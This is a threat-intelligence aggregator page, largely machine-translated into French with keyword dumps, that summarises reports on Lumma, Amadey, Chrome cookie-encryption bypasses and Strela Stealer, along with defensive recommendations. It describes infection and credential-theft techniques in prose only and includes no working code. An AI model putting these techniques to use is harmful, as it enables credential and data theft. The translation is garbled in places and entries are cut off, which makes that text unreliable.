One Article Review
| Source |  RiskIQ |
|---|---|
| Identifiant | 8603374 |
| Date de publication | 2024-10-29 16:30:09 (vue: 2024-10-29 17:07:18) |
| Titre | Lumma/Amadey: fake CAPTCHAs want to know if you\'re human (Recyclage) |
| Texte | ## Instantané Les cybercriminels continuent d'utiliser [Fake capchas] (https://security.microsoft.com/intel-explorer/articles/9c8e0b72) comme vecteur d'infection initial pour distribuer des logiciels malades.[Lumma Stealer] (https://security.microsoft.com/intel-profiles/3393357882548511C30B0728DDD3C4F8B5CA20E41C285A56F796EB39F57531ad) , plates-formes de paris, animeRessources et applications Web.Les chercheurs de sécurité ont également découvert Captchas livrant le Trojan Amadey. ## Description Le Captcha malveillant fait partie d'un réseau publicitaire qui a de réelles offres en plus des redirections menant à des pages avec le faux captcha.Le CAPTCHA informe les utilisateurs dans l'exécution d'une commande PowerShell codée de base64, qui conduit à un script PowerShell obscurci qui télécharge la charge utile malveillante.Le Lumma Stealer fonctionne en utilisant l'outil légitime BitlockerTogo.exe pour manipuler le registre et rechercher des fichiers associés aux portefeuilles de crypto-monnaie, les extensions de navigateur, les cookies et les archives du gestionnaire de mots de passe pour voler des données.Le Troie tente d'utiliser l'outil pour envoyer les données volées au serveur de l'attaquant \\.Ensuite, il visite divers magasins en ligne, éventuellement pour stimuler les vues pour générer des revenus pour ses opérateurs.De plus, la campagne distribue le Trojan Amadey, qui vole les informations d'identification des navigateurs Web et de divers systèmes de calcul de réseau virtuel (VNC), remplace les adresses de portefeuille Crypto dans le presse-papiers et, dans certains cas, prend des sachets et télécharge l'outil d'accès à distance RemcOAccès à l'appareil de la victime. Securelist rapporte que du 22 septembre au 14 octobre 2024, plus de 140 000 utilisateurs ont rencontré des publicités liées à cette campagne, et plus de 20 000 d'entre eux ont été redirigés vers des sites infectés.Les utilisateurs les plus touchés étaient au Brésil, en Espagne, en Italie et en Russie. ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact de cette menace.Vérifiez la carte de recommandations pour l'état de déploiement des atténuations surveillées. - Vérifiez les paramètres de filtrage des e-mails Office 365 pour vous assurer de bloquer les e-mails, le spam et les e-mails avec des logiciels malveillants.Utilisez [Microsoft Defender pour Office 365] (https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-foro-office-365?ocid=Magicti_Ta_learnDoc) pour une protection et une couverture de phishing améliorées contrenouvelles menaces et variantes polymorphes.Configurez Microsoft Defender pour Office 365 à [Rechercher les liens sur Click] (https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-links-about?ocid=magicti_ta_learndoc) et [derete SenteMail] (https://learn.microsoft.com/microsoft-365/security/office-365-security/zero-hour-auto-purge?ocid=Magicti_ta_learndoc) en réponse à l'intelligence de menace nouvellement acquise.Allumez [les politiques de pièces jointes de sécurité] (https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-attachments-polies-configure?ocid=Magicti_TA_LearnDoc) pour vérifier les pièces jointes à l'e-mail entrant. - Encourager les utilisateurs à utiliser Microsoft Edge et d'autres navigateurs Web qui prennent en charge [SmartScreen] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/web-overview?ocid=Magicti_TA_LearnDDoc), qui identifieet bloque des sites Web malveillants, y compris des sites de phishing, des sites d'arnaque et des sites qui hébergent des logiciels malveillants. - Allumez [Protection en livraison du cloud] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-lock-at-first-sight-microsoft-defender-asvirus?ocid=magicti_ta_learndoc)Dans Microsoft Defender Antivirus, ou l'équivalent de votre produit antivirus, pour couvrir les outils et techniques d'att |
| Notes | ★★ |
| Envoyé | Oui |
| Condensat | ### **© 000 140 2024 2024** 2147069186 2147078266 2147117932 365 365/security/defender 365/security/office about access accessed accounts acquired addition additionally addresses ads adult advice: affected against age all also amadey amadey/114312/ anime antivirus any app apps archives are article associated attachments attack attacker attempts authentication authenticator auto base64 based behind betting bitlockertogo block blocks boost brazil browser browsers bullet but campaign can captcha captcha: captchas card cases check classes clever click clicking clipboard cloud code com/azure/active com/deployedge/microsoft com/en com/fake com/intel com/microsoft command common computing configure content continue cookies copyright cover coverage cracked credential credentials criterion crypto cryptocurrency customers cybercriminals data defender delete delivered delivering delivers deployment description detections/hunting device devices different directory/authentication/concept directory/authentication/how directory/identity discovered distribute distributing distribution downloads due edge email emails employees enable enabled encoded encountered encourage encyclopedia endpoint/attack endpoint/configure endpoint/detect endpoint/web enforce enhanced ensure enterprise entire equivalent even evolving example excluded exe executable executing execution explorer/articles/9c8e0b72 extensions fake features fido file files filtering first following from full games gateway generate group grown guidance has hello host hosting hour https://learn https://securelist https://security https://www human identifies identity impact inbound include including infected infection infections infostealer infostealers initial intelligence intrusions italy its keys know leading leads learndoc learndoc#block learning legitimate like links list locations lumma lumma/amadey: machine mail majority malicious malware managed manager manipulate many match mbjg meet methods mfa microsoft mitigation mitigations mode monitored more most msr&threatid= mtb mtb&threatid= name=pws:win32/lumma name=trojan:win32/amadey name=trojan:win32/lummacstealer name=trojan:win32/lummastealer name=trojan:win64/lumma network new newly not number obfuscated ocid=magicti october off offer offers office online operates operators organizations other over overview pages part password passwordless passwords payload permission personal phishing phones platforms points policies policy polymorphic possible possibly potentially powershell prevalence prevent product profiles/33933578825488511c30b0728dd3c4f8b5ca20e41c285a56f796eb39f57531ad prohibited prompt protection protection/howto protections pua purge pws:win32/lumma queries ransomware rapidly real recheck recommendations recommends redirected redirects reduce reduction refer reference references registry related remcos remind remote remove reports reproduction require requires researchers reserved resources response revenue rights rules running russia safe scam screenshots script scripts search secured securelist security/defender security/safe security/zero securlist send sent september server services settings sharing should sight since site sites smartscreen snapshot some spain spam specific spoofed status steal stealer steals stolen stop stored stores strictly substitutes succeeded support surface sweeping sync#sync syncing systems takes techniques theft then thereof those threat threats through times tool tools tricks trojan trojan:win32/acll trojan:win32/amadey trojan:win32/lummacstealer trojan:win32/lummastealer trojan:win32/malgentera trojan:win64/lumma trusted turn typed unknown unless unwanted us/wdsi/threats/malware use used users uses using variants various vaults vector victim views virtual visits vnc wallet wallets want wasprimarily web websites when where which windows without workplace written you your “yes” |
| Tags | Ransomware Spam Malware Tool Threat |
| Stories | |
| Move | 
|
Les reprises de l'article (1):
| Source | RiskIQ |
|---|---|
| Identifiant | 8603011 |
| Date de publication | 2024-10-28 21:32:18 (vue: 2024-10-28 22:07:21) |
| Titre | Katz and Mouse Game: Maas InfostEllers s'adapte aux défenses chromées patchées Katz and Mouse Game: MaaS Infostealers Adapt to Patched Chrome Defenses |
| Texte | ## Instantané Elastic Security Labs a identifié plusieurs techniques utilisées par différentes familles de logiciels malveillants pour contourner la fonction de chiffrement liée à l'application de Google Chrome, qui a été implémentée pour protéger les cookies stockés dans Chrome sous Windows. ## Description Les infostelleurs ont écrit un nouveau code pour contourner cette protection afin de rester compétitif sur le marché et de fournir des capacités qui récupèrent de manière fiable les données de cookies des navigateurs de Chrome.Les techniques utilisées par les familles d'infostealer comprennent l'intégration de l'outil de sécurité offensive Chromekatz, de tirer parti du COM pour interagir avec les services de Chrome et de décrypter la clé de cryptage liée à l'application et d'utiliser la fonction de débogage à distance au sein de Chrome.Les infostelleurs, dont Stealc, Metastealer, Phemedrone, Xenosteraler et [Lumma] (https://security.microsoft.com/intel-profiles/33933578825488511C30B0728D3C4F8B5CA20E41C285A passe la fonction de protection des cookies récente de Google à l'aide de l'applicationCryptage lié. Stealc et Vidar se sont installés sur la même implémentation, ce qui implique la création d'un processus d'enfant en utilisant un fichier PE intégré dans la section de données du binaire pour extraire des valeurs de cookies non cryptées résidant dans l'un des processus enfants de Chrome \\.Metastealer utilise une technique similaire à celle démontrée dans un GIST partagée sur X le 27 septembre, qui pourrait avoir servi d'inspiration aux auteurs de logiciels malveillants.PheMedrone utilise une combinaison de fonctions d'assistance pour extraire les cookies, tandis que Xenoséaler lance une instance de Chrome \ [. \] EXE, puis injecte du code à l'aide d'une classe d'assistance appelée Sharpinjector, passant la clé cryptée comme paramètre.Lumma utilise la numérisation des motifs pour cibler le composant Cookiemonster de Chrome \\ pour identifier et vider les cookies dans un texte clair à partir du processus Chrome. ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact de cette menace.Vérifiez la carte de recommandations pour l'état de déploiement des atténuations surveillées. - Vérifiez les paramètres de filtrage des e-mails Office 365 pour vous assurer de bloquer les e-mails, le spam et les e-mails avec des logiciels malveillants.Utilisez [Microsoft Defender pour Office 365] (https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-foro-office-365?ocid=Magicti_Ta_learnDoc) pour une protection et une couverture de phishing améliorées contrenouvelles menaces et variantes polymorphes.Configurez Microsoft Defender pour Office 365 à [Rechercher les liens sur Click] (https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-links-about?ocid=magicti_ta_learndoc) et [derete SenteMail] (https://learn.microsoft.com/microsoft-365/security/office-365-security/zero-hour-auto-purge?ocid=Magicti_ta_learndoc) en réponse à l'intelligence de menace nouvellement acquise.Allumez [les politiques de pièces jointes de sécurité] (https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-attachments-polies-configure?ocid=Magicti_TA_LearnDoc) pour vérifier les pièces jointes à l'e-mail entrant. - Encourager les utilisateurs à utiliser Microsoft Edge et d'autres navigateurs Web qui prennent en charge [SmartScreen] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/web-overview?ocid=Magicti_TA_LearnDDoc), qui identifieet bloque des sites Web malveillants, y compris des sites de phishing, des sites d'arnaque et des sites qui hébergent des logiciels malveillants.Allumez [Protection réseau] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?ocid=Magicti_TA_LearnDoc) pour bloquer les connexions aux domaines malveillants et aux adresses IP. - Vérifiez votre pare-feu de périmèt |
| Notes | ★★★ |
| Envoyé | Oui |
| Condensat | ### **© 2024 2024** 2147078266 2147117932 2147125956&ocid=magicti 27th 365 365/security/defender 365/security/office about accessed accessing accounts acquired activity adapt addresses advanced advice: against age all and antivirus any app application apps arbitrary are around article attachments attack attacker attempts authentication authenticator authors auto based below binary block blocks bound browser browsers browsing bullet business bypass bypasses called can can capabilities card check child chrome chromekatz circumvent class classes clear click clicking cloud co/security code com com/azure/active com/deployedge/microsoft com/en com/intel com/microsoft combination common communication competitive component configure connections content cookie cookiemonster cookies copyright cover coverage credential credentials criterion customers data debugging decrypt defender defenses delete deliver delivered demonstrated deployment description detections/hunting devices different directory/authentication/concept directory/authentication/how directory/identity distribution domains downloads due dump edge educate elastic email emails embedded employees employs enable enabled encourage encrypted encryption ency encyclopedia endpoint/attack endpoint/configure endpoint/detect endpoint/enable endpoint/web enforce enhanced ensure enterprise entire equivalent even evolving example excluded exe executable execution extract families feature features fido file files filtering firewall first following from functions game game: gist google group guidance has have hello help helper holes host hour https://learn https://security https://www identified identifies identify identifying identity impact implementation implemented inbound include including infections information infostealer infostealers inhibit injects inspiration instance integrating intelligence interact internet intrusions involves katz key keys labs labs/katz lateral launches learn learndoc learndoc#block learndoc#use learning leveraging like links list locations lumma lures maas machine mail majority malicious malware managed many market match may media meet metastealer methods mfa microsoft mitigation mitigations mode monitored more mouse movement msr&threatid= mtb&threatid= multiple name=pws:win32/lumma name=spyware:win32/stealc name=spyware:win64/stealc name=trojan:win32/lummacstealer name=trojan:win32/vidar network new newly not number obfuscated ocid=magicti off offensive offer office one on order organizations other out overview parameter part passing password passwordless passwords patched pattern paz perimeter permission personal phemedrone phishing phones points policies policy polymorphic possible potentially prevalence prevent process processes product profiles/33933578825488511c30b0728dd3c4f8b5ca20e41c285a56f796eb39f57531ad prohibited prompt protect protecting protection protection/howto protections proxy pua purge pws:win32/lumma queries ransom ransomware rapidly recent recheck recommendations recommends reconnaissance reduce reduction refer reference references reliably remind remote remove reporting reproduction require requires reserved residing resource resources response restricted restrictions retrieve rights rules running safe same scam scanning scripts section secured security security/defender security/safe security/zero sent september served servers services settings settled shared sharpinjector should sight similar site sites smartscreen snapshot social spam spawning spear specific spoofed spyware:win32/stealc spyware:win64/stealc stage: status stay stealc stealer stop stored strictly succeeded such support support surface suspicious sweeping sync#sync syncing target technique techniques techniques: text theft their then thereof threat threats times tool tools to trojan:win32/lummacstealer trojan:win32/vidar truly trusted turn typed unencrypted unknown unless unsolicited unwanted us/wdsi/threats/malware use used users uses use using using values variants vaults vidar watering web websites when where which wi |
| Tags | Ransomware Spam Malware Tool Threat |
| Stories | |
| Move |
|
L'article ressemble à 1 autre(s) article(s):
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
|
2024-10-30 22:28:21 | (Déjà vu) Strela Stealer cible le centre et le sud-ouest de l'Europe grâce à une exécution furtive via webdav Strela Stealer targets Central and Southwestern Europe through Stealthy Execution via WebDAV (lien direct) |
#### Targeted Geolocations - Spain - Germany ## Snapshot The latest Strela Stealer phishing campaign, identified by Cyble Research and Intelligence Labs, uses deceptive invoices to lure victims, mainly impacting Central and Southwestern Europe. ## Description These phishing emails contain ZIP files with obfuscated JavaScript files that, when opened, trigger a PowerShell command to download a malicious payload directly from a WebDAV (Web Distributed Authoring and Versioning) server. This method allows Strela Stealer to bypass detection by not saving files to disk. The malware\'s payload is embedded within a DLL file designed to extract email credentials and other sensitive details, specifically from Microsoft Outlook and Mozilla Thunderbird, which are then transmitted to the attackers\' command server. Strela Stealer tailors its activity to specific geographic areas, in this campaign mainly Germany and Spain, by checking locale settings on the infected system. Additionally, it collects system details and file directory data, which allows attackers to perform reconnaissance and possibly conduct follow-up attacks. The malware uses sophisticated evasion techniques, such as JavaScript obfuscation and base64 encoding, making it challenging for security tools to detect. Strela Stealer\'s evolution-from simple phishing with ISO attachments to complex fileless execution-highlights the ongoing advancements in malware distribution tactics, emphasizing the need for robust cybersecurity measures to address such sophisticated threats. ## Microsoft Analysis and Additional OSINT Context Threat actors use WebDAV for distributing information-stealing malware, such as Strela Stealer, because it offers several advantages for evasion, simplicity, and control over payload delivery: - Fileless Execution and Evasion: WebDAV enables fileless malware execution by running malicious payloads directly from remote servers without saving them locally on the target machine. This helps bypass many traditional security defenses that focus on scanning files on disk, as no local file is created. - Direct Remote Access: WebDAV is designed to allow clients to interact with remote servers as though they were local folders. This allows threat actors to distribute payloads seamlessly over HTTP/HTTPS, appearing as legitimate remote connections to the system, which reduces the chances of detection. - Efficient Data Transmission: WebDAV supports real-time access to resources over the network, making it efficient for both distribution and control. Attackers can change payloads or update malicious DLLs on their WebDAV server, ensuring that new or adapted versions of malware are available without having to reinfect machines. - Bypassing Firewalls and Security Filters: Many organizations allow outbound WebDAV traffic through HTTP or HTTPS. This allows attackers to communicate with compromised devices without raising alarms, as this traffic blends in with normal web traffic. - Modular and Scalable Attacks: By using WebDAV, threat actors can scale their operations, as they only need to update files on a centralized server to infect multiple systems, enhancing the malware\'s reach with minimal adjustments on the attacker\'s side. These qualities make WebDAV an attractive option for attackers seeking stealthy, flexible, and scalable methods to deliver information-stealing malware. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations. - Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use [Microsoft Defender for Office 365](https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-for-office-365?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 t | Ransomware Spam Malware Tool Threat | ★★ |